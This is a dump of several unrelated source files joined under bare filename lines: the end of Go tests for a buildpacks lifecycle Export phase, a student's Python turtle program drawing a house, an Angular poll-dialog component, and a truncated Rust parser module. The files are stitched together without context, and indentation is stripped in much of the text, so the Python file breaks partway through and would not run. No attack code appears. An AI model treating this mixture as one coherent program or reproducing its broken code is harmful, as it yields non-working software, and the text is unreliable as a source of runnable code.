err := lifecycle.Export(context.Background(), expectedRepos[0], expectedRepos[1], true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_REGISTRY_AUTH={}")
})
it("configures the phase with root", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Export(context.Background(), "test", "test", true, "", expectedNetworkMode, fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBind := "some-cache:/cache"
err := lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBind)
})
it("configures the phase to write stack toml", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBinds := []string{"some-cache:/cache", "some-launch-cache:/launch-cache"}
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
h.AssertEq(t, len(configProvider.ContainerOps()), 2)
h.AssertFunctionName(t, configProvider.ContainerOps()[0], "WriteStackToml")
h.AssertFunctionName(t, configProvider.ContainerOps()[1], "WriteProjectMetadata")
})
it("configures the phase with default process type", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.DefaultProcessType = "test-process"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedDefaultProc := []string{"-process-type", "test-process"}
err := lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, expectedDefaultProc)
})
when("using cache image and publishing", func() {
it.Before(func() {
fakeBuildCache.ReturnForType = cache.Image
fakeBuildCache.ReturnForName = "some-cache-image"
})
it("configures phase with cache image", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedRepoName := "some-repo-name"
expectedRunImage := "some-run-image"
err := verboseLifecycle.Export(context.Background(), expectedRepoName, expectedRunImage, true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, ":/cache")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-cache-image", "some-cache-image"},
)
})
})
when("platform 0.3", func() {
it("doesn't hint at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
when("platform 0.4", func() {
it("hints at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.4")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-process-type", "web"})
})
})
when("platform >= 0.6", func() {
when("no user provided process type is present", func() {
it("doesn't provide 'web' as default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.6")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", true, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
})
})
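// With publish set to false, the exporter targets the daemon: -daemon and
// -launch-cache are passed, and daemon access mirrors the Create tests.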
when("publish is false", func() {
it("runs the phase with the lifecycle image", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.LifecycleImage = "some-lifecycle-image"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().Image, "some-lifecycle-image")
})
it("sets the CNB_USER_ID and CNB_GROUP_ID in the environment", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithUID(2222), fakes.WithGID(3333))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_USER_ID=2222")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "CNB_GROUP_ID=3333")
})
it("configures the phase with daemon access", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.ContainerConfig().User, "root")
h.AssertSliceContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
})
it("configures the phase with daemon access with tcp docker-host", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := lifecycle.Export(context.Background(), "test", "test", false, "tcp://localhost:1234", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.HostConfig().Binds, "/var/run/docker.sock:/var/run/docker.sock")
h.AssertSliceContains(t, configProvider.ContainerConfig().Env, "DOCKER_HOST=tcp://localhost:1234")
})
it("configures the phase with the expected arguments", func() {
verboseLifecycle := newTestLifecycleExec(t, true)
fakePhaseFactory := fakes.NewFakePhaseFactory()
err := verboseLifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.Name(), "exporter")
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-daemon"},
[]string{"-launch-cache", "/launch-cache"},
)
})
it("configures the phase with the expected network mode", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedNetworkMode := "some-network-mode"
err := lifecycle.Export(context.Background(), "test", "test", false, "", expectedNetworkMode, fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertEq(t, configProvider.HostConfig().NetworkMode, container.NetworkMode(expectedNetworkMode))
})
it("configures the phase with binds", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBinds := []string{"some-cache:/cache", "some-launch-cache:/launch-cache"}
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
})
it("configures the phase to write stack toml", func() {
lifecycle := newTestLifecycleExec(t, false)
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedBinds := []string{"some-cache:/cache", "some-launch-cache:/launch-cache"}
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceContains(t, configProvider.HostConfig().Binds, expectedBinds...)
h.AssertEq(t, len(configProvider.ContainerOps()), 2)
h.AssertFunctionName(t, configProvider.ContainerOps()[0], "WriteStackToml")
h.AssertFunctionName(t, configProvider.ContainerOps()[1], "WriteProjectMetadata")
})
it("configures the phase with default process type", func() {
lifecycle := newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.DefaultProcessType = "test-process"
})
fakePhaseFactory := fakes.NewFakePhaseFactory()
expectedDefaultProc := []string{"-process-type", "test-process"}
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, expectedDefaultProc)
})
when("platform 0.3", func() {
it("doesn't hint at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
when("platform 0.4", func() {
it("hints at default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.4")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t, configProvider.ContainerConfig().Cmd, []string{"-process-type", "web"})
})
})
when("platform >= 0.6", func() {
when("no user provided process type is present", func() {
it("doesn't provide 'web' as default process type", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.6")}))
h.AssertNil(t, err)
lifecycle := newTestLifecycleExec(t, true, fakes.WithBuilder(fakeBuilder))
fakePhaseFactory := fakes.NewFakePhaseFactory()
err = lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-process-type")
})
})
})
})
when("override GID", func() {
var (
lifecycle *build.LifecycleExecution
fakePhaseFactory *fakes.FakePhaseFactory
)
fakePhase := &fakes.FakePhase{}
fakePhaseFactory = fakes.NewFakePhaseFactory(fakes.WhichReturnsForNew(fakePhase))
when("override GID is provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = 2
})
})
it("configures the phase with the expected arguments", func() {
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertIncludeAllExpectedPatterns(t,
configProvider.ContainerConfig().Cmd,
[]string{"-gid", "2"},
)
})
})
when("override GID is not provided", func() {
it.Before(func() {
lifecycle = newTestLifecycleExec(t, true, func(options *build.LifecycleOptions) {
options.GID = -1
})
})
it("gid is not added to the expected arguments", func() {
err := lifecycle.Export(context.Background(), "test", "test", false, "", "test", fakeBuildCache, fakeLaunchCache, []string{}, fakePhaseFactory)
h.AssertNil(t, err)
lastCallIndex := len(fakePhaseFactory.NewCalledWithProvider) - 1
h.AssertNotEq(t, lastCallIndex, -1)
configProvider := fakePhaseFactory.NewCalledWithProvider[lastCallIndex]
h.AssertSliceNotContains(t, configProvider.ContainerConfig().Cmd, "-gid")
})
})
})
})
}
func newTestLifecycleExecErr(t *testing.T, logVerbose bool, ops ...func(*build.LifecycleOptions)) (*build.LifecycleExecution, error) {
docker, err := client.NewClientWithOpts(client.FromEnv, client.WithVersion("1.38"))
h.AssertNil(t, err)
var outBuf bytes.Buffer
logger := ilogging.NewLogWithWriters(&outBuf, &outBuf)
if logVerbose {
logger.Level = log.DebugLevel
}
defaultBuilder, err := fakes.NewFakeBuilder()
h.AssertNil(t, err)
opts := build.LifecycleOptions{
AppPath: "some-app-path",
Builder: defaultBuilder,
HTTPProxy: "some-http-proxy",
HTTPSProxy: "some-https-proxy",
NoProxy: "some-no-proxy",
}
for _, op := range ops {
op(&opts)
}
return build.NewLifecycleExecution(logger, docker, opts)
}
func newTestLifecycleExec(t *testing.T, logVerbose bool, ops ...func(*build.LifecycleOptions)) *build.LifecycleExecution {
t.Helper()
lifecycleExec, err := newTestLifecycleExecErr(t, logVerbose, ops...)
h.AssertNil(t, err)
return lifecycleExec
}
A03_Wellst.py
#######################################################################################################################
# Taran Wells
# Wellst
# https://docs.google.com/document/d/1RBeOXjYBBjZ507wVeQVIPBrU7gBvTNJi8BYGDvtC53w/edit?usp=sharing
#######################################################################################################################
import turtle  # allows us to use the turtle library
wn = turtle.Screen()
wn.colormode(255)
# setup turtles
base = turtle.Turtle()
base.hideturtle()
roof = turtle.Turtle()
roof.hideturtle()
glass = turtle.Turtle()  # helper turtle; created but never used below
wn.bgcolor("red")
def house_base(t, sz):
    """Base of house"""
    t.color(250, 165, 10)  # house orange
    t.pendown()
    t.begin_fill()
    for side in range(2):
        t.forward(sz)
        t.right(90)  # square house
        t.forward(sz)
        t.right(90)
    t.end_fill()
    t.penup()
def house_roof(t1, sz):
"""Roof of house"""
t1.color(135, 30, 160) # roof purple
t1.begin_fill()
for side in range(3):
t1.forward(sz) # shape roof
t1.left(120)
t1.end_fill()
t1.penup()
def placement(t2, sz):
"""place glass in starting position"""
t2.fd(sz)
t2.right(90)
t2.fd(sz)
def house_window(t3):
"""window on house"""
t3.begin_fill()
t3.pendown()
t3.pencolor('black')
for side in range(4):
t3.fd(35)
t3.right(90)
t3.fillcolor(30, 135, 160) # make window light blue
t3.end_fill()
def main():
roof.penup()
roof.back(30)
roof.pendown()
house_base(base, 140)
placement(base, 70)
house_roof(roof, 200)
house_window(base)
base.left(90)
house_window(base)
base.left(90)
house_window(base)
base.left(90)
house_window(base)
base.pu()
base.left(90)
base.fd(70)
base.right(90)
base.pd()
base.begin_fill()
for grass in range(2):
base.fd(1000)
base.left(90)
base.fd(2000)
base.left(90)
base.fd(1000)
base.left(90)
base.fd(1000)
base.fillcolor(0, 255, 0)
base.end_fill()
main() # calls on main function
wn.exitonclick()
assignment-poll-dialog.component.ts
import { Component, Inject } from '@angular/core';
import { FormBuilder } from '@angular/forms';
import { MAT_DIALOG_DATA, MatDialogRef } from '@angular/material/dialog';
import { TranslateService } from '@ngx-translate/core';
import { PollDialogData } from 'app/core/ui-services/base-poll-dialog.service';
import { ComponentServiceCollector } from 'app/core/ui-services/component-service-collector';
import { BaseModel } from 'app/shared/models/base/base-model';
import {
    AssignmentPollMethodVerbose,
    AssignmentPollPercentBaseVerbose,
    GeneralValueVerbose,
    PollMethod,
    PollPropertyVerbose,
    VoteValue
} from 'app/shared/models/poll/poll-constants';
import { ViewPoll } from 'app/shared/models/poll/view-poll';
import { ViewAssignment } from 'app/site/assignments/models/view-assignment';
import { BasePollDialogComponent } from 'app/site/polls/components/base-poll-dialog.component';
import { debounceTime, distinctUntilChanged } from 'rxjs/operators';
import { AssignmentPollService, UnknownUserLabel } from '../../services/assignment-poll.service';
/**
* A dialog for updating the values of an assignment-related poll.
*/
@Component({
selector: `os-assignment-poll-dialog`,
templateUrl: `./assignment-poll-dialog.component.html`,
styleUrls: [`./assignment-poll-dialog.component.scss`]
})
export class AssignmentPollDialogComponent extends BasePollDialogComponent {
public unknownUserLabel = UnknownUserLabel;
/**
* List of accepted special non-numerical values.
* See {@link PollService.specialPollVotes}
*/
public specialValues: [number, string][];
public generalValueVerbose = GeneralValueVerbose;
public PollPropertyVerbose = PollPropertyVerbose;
public AssignmentPollMethodVerbose = AssignmentPollMethodVerbose;
public AssignmentPollPercentBaseVerbose = AssignmentPollPercentBaseVerbose;
public readonly globalValues = [`global_yes`, `global_no`, `global_abstain`];
/**
     * Constructor. Retrieves necessary metadata from the pollService
     * and injects the poll itself.
*/
public constructor(
componentServiceCollector: ComponentServiceCollector,
protected translate: TranslateService,
formBuilder: FormBuilder,
public dialogRef: MatDialogRef<BasePollDialogComponent>,
public assignmentPollService: AssignmentPollService,
@Inject(MAT_DIALOG_DATA) public pollData: PollDialogData | ViewPoll
) {
super(componentServiceCollector, translate, dialogRef, pollData, formBuilder);
}
public onBeforeInit(): void {
this.subscriptions.push(
this.pollForm.contentForm.valueChanges.pipe(debounceTime(150), distinctUntilChanged()).subscribe(() => {
this.triggerUpdate();
})
);
}
protected getContentObjectsForOptions(): BaseModel[] {
if (!this.pollData) {
return [];
}
const contentObject = this.pollData.content_object as ViewAssignment;
return contentObject.candidatesAsUsers;
}
protected getAnalogVoteFields(): VoteValue[] {
const pollmethod = this.pollForm.contentForm.get(`pollmethod`).value;
const analogPollValues: VoteValue[] = [];
if (pollmethod === PollMethod.N) {
analogPollValues.push(`N`);
} else {
analogPollValues.push(`Y`);
if (pollmethod !== PollMethod.Y) {
analogPollValues.push(`N`);
}
if (pollmethod === PollMethod.YNA) {
analogPollValues.push(`A`);
}
}
return analogPollValues;
}
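    // Illustrative mapping, assuming the usual N/Y/YN/YNA poll method values:
    // N -> ['N'], Y -> ['Y'], YN -> ['Y', 'N'], YNA -> ['Y', 'N', 'A'].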
}
mod.rs
pub mod attr;
mod diagnostics;
mod expr;
mod generics;
mod item;
mod nonterminal;
mod pat;
mod path;
mod stmt;
mod ty;
use crate::lexer::UnmatchedBrace;
pub use diagnostics::AttemptLocalParseRecovery;
use diagnostics::Error;
pub use path::PathStyle;
use rustc_ast::ptr::P;
use rustc_ast::token::{self, DelimToken, Token, TokenKind};
use rustc_ast::tokenstream::{self, DelimSpan, TokenStream, TokenTree, TreeAndSpacing};
use rustc_ast::DUMMY_NODE_ID;
use rustc_ast::{self as ast, AnonConst, AttrStyle, AttrVec, Const, CrateSugar, Extern, Unsafe};
use rustc_ast::{Async, Expr, ExprKind, MacArgs, MacDelimiter, Mutability, StrLit};
use rustc_ast::{Visibility, VisibilityKind};
use rustc_ast_pretty::pprust;
use rustc_errors::{struct_span_err, Applicability, DiagnosticBuilder, FatalError, PResult};
use rustc_session::parse::ParseSess;
use rustc_span::source_map::{Span, DUMMY_SP};
use rustc_span::symbol::{kw, sym, Ident, Symbol};
use tracing::debug;
use std::{cmp, mem, slice};
bitflags::bitflags! {
struct Restrictions: u8 {
const STMT_EXPR = 1 << 0;
const NO_STRUCT_LITERAL = 1 << 1;
}
}
#[derive(Clone, Copy, PartialEq, Debug)]
enum SemiColonMode {
Break,
Ignore,
Comma,
}
#[derive(Clone, Copy, PartialEq, Debug)]
enum BlockMode {
Break,
Ignore,
}
/// Like `maybe_whole_expr`, but for things other than expressions.
#[macro_export]
macro_rules! maybe_whole {
($p:expr, $constructor:ident, |$x:ident| $e:expr) => {
if let token::Interpolated(nt) = &$p.token.kind {
if let token::$constructor(x) = &**nt {
let $x = x.clone();
$p.bump();
return Ok($e);
}
}
};
}
/// If the next tokens are ill-formed `$ty::` recover them as `<$ty>::`.
#[macro_export]
macro_rules! maybe_recover_from_interpolated_ty_qpath {
($self: expr, $allow_qpath_recovery: expr) => {
if $allow_qpath_recovery && $self.look_ahead(1, |t| t == &token::ModSep) {
if let token::Interpolated(nt) = &$self.token.kind {
if let token::NtTy(ty) = &**nt {
let ty = ty.clone();
$self.bump();
return $self.maybe_recover_from_bad_qpath_stage_2($self.prev_token.span, ty);
}
}
}
};
}
#[derive(Clone)]
pub struct Parser<'a> {
pub sess: &'a ParseSess,
/// The current token.
pub token: Token,
/// The previous token.
pub prev_token: Token,
restrictions: Restrictions,
expected_tokens: Vec<TokenType>,
token_cursor: TokenCursor,
desugar_doc_comments: bool,
/// This field is used to keep track of how many left angle brackets we have seen. This is
/// required in order to detect extra leading left angle brackets (`<` characters) and error
/// appropriately.
///
/// See the comments in the `parse_path_segment` function for more details.
unmatched_angle_bracket_count: u32,
max_angle_bracket_count: u32,
/// A list of all unclosed delimiters found by the lexer. If an entry is used for error recovery
/// it gets removed from here. Every entry left at the end gets emitted as an independent
/// error.
pub(super) unclosed_delims: Vec<UnmatchedBrace>,
last_unexpected_token_span: Option<Span>,
/// Span pointing at the `:` for the last type ascription the parser has seen, and whether it
/// looked like it could have been a mistyped path or literal `Option:Some(42)`).
pub last_type_ascription: Option<(Span, bool /* likely path typo */)>,
/// If present, this `Parser` is not parsing Rust code but rather a macro call.
subparser_name: Option<&'static str>,
}
impl<'a> Drop for Parser<'a> {
fn drop(&mut self) {
emit_unclosed_delims(&mut self.unclosed_delims, &self.sess);
}
}
#[derive(Clone)]
struct TokenCursor {
frame: TokenCursorFrame,
stack: Vec<TokenCursorFrame>,
cur_token: Option<TreeAndSpacing>,
collecting: Option<Collecting>,
}
#[derive(Clone)]
struct TokenCursorFrame {
delim: token::DelimToken,
span: DelimSpan,
open_delim: bool,
tree_cursor: tokenstream::Cursor,
close_delim: bool,
}
/// Used to track additional state needed by `collect_tokens`
#[derive(Clone, Debug)]
struct Collecting {
/// Holds the current tokens captured during the most
/// recent call to `collect_tokens`
buf: Vec<TreeAndSpacing>,
/// The depth of the `TokenCursor` stack at the time
/// collection was started. When we encounter a `TokenTree::Delimited`,
/// we want to record the `TokenTree::Delimited` itself,
/// but *not* any of the inner tokens while we are inside
/// the new frame (this would cause us to record duplicate tokens).
///
    /// This `depth` field tracks the stack depth at which we are recording tokens.
/// Only tokens encountered at this depth will be recorded. See
/// `TokenCursor::next` for more details.
depth: usize,
}
impl TokenCursorFrame {
fn new(span: DelimSpan, delim: DelimToken, tts: &TokenStream) -> Self {
TokenCursorFrame {
delim,
span,
open_delim: delim == token::NoDelim,
tree_cursor: tts.clone().into_trees(),
close_delim: delim == token::NoDelim,
}
}
}
impl TokenCursor {
fn next(&mut self) -> Token {
loop {
let tree = if !self.frame.open_delim {
self.frame.open_delim = true;
TokenTree::open_tt(self.frame.span, self.frame.delim).into()
} else if let Some(tree) = self.frame.tree_cursor.next_with_spacing() {
tree
} else if !self.frame.close_delim {
self.frame.close_delim = true;
TokenTree::close_tt(self.frame.span, self.frame.delim).into()
} else if let Some(frame) = self.stack.pop() {
self.frame = frame;
continue;
} else {
return Token::new(token::Eof, DUMMY_SP);
};
// Don't set an open delimiter as our current token - we want
// to leave it as the full `TokenTree::Delimited` from the previous
// iteration of this loop
if !matches!(tree.0, TokenTree::Token(Token { kind: TokenKind::OpenDelim(_), .. })) {
self.cur_token = Some(tree.clone());
}
if let Some(collecting) = &mut self.collecting {
if collecting.depth == self.stack.len() {
debug!(
"TokenCursor::next(): collected {:?} at depth {:?}",
tree,
self.stack.len()
);
collecting.buf.push(tree.clone())
}
}
match tree.0 {
TokenTree::Token(token) => return token,
TokenTree::Delimited(sp, delim, tts) => {
let frame = TokenCursorFrame::new(sp, delim, &tts);
self.stack.push(mem::replace(&mut self.frame, frame));
}
}
}
}
fn next_desugared(&mut self) -> Token {
let (data, attr_style, sp) = match self.next() {
Token { kind: token::DocComment(_, attr_style, data), span } => {
(data, attr_style, span)
}
tok => return tok,
};
// Searches for the occurrences of `"#*` and returns the minimum number of `#`s
// required to wrap the text.
let mut num_of_hashes = 0;
let mut count = 0;
for ch in data.as_str().chars() {
count = match ch {
'"' => 1,
'#' if count > 0 => count + 1,
_ => 0,
};
num_of_hashes = cmp::max(num_of_hashes, count);
}
let delim_span = DelimSpan::from_single(sp);
let body = TokenTree::Delimited(
delim_span,
token::Bracket,
[
TokenTree::token(token::Ident(sym::doc, false), sp),
TokenTree::token(token::Eq, sp),
TokenTree::token(TokenKind::lit(token::StrRaw(num_of_hashes), data, None), sp),
]
.iter()
.cloned()
.collect::<TokenStream>(),
);
self.stack.push(mem::replace(
&mut self.frame,
TokenCursorFrame::new(
delim_span,
token::NoDelim,
&if attr_style == AttrStyle::Inner {
